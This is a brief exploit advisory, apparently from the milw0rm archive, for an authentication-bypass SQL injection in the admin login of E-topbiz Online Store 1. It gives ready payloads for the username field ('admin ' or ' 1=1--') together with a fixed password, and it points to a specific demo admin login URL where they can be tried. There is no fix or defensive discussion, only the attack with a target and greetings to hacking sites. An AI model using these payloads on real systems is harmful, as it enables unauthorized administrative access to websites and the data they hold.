E-topbiz Online Store 1 (Auth Bypass) SQL Injection Vulnerability
author: ZoRLu msn: trt-turk@hotmail.com
Home: www.z0rlu.blogspot.com
NOTE: LONELINESS LOST ITS MEANING IN MY LONELINESS : ( ( I'm fed up a.q )
Exploit:
username: [real_admin_name] ' or ' 1=1
password: ZoRLu
note: generally admin name: admin
for demo:
http://e-topbiz.com/trafficdemos/store1/admin/login.php
username: admin ' or ' 1=1--
password: ZoRLu
thanks: str0ke & yildirimordulari.org & darkc0de.com
# milw0rm.com [2008-11-07]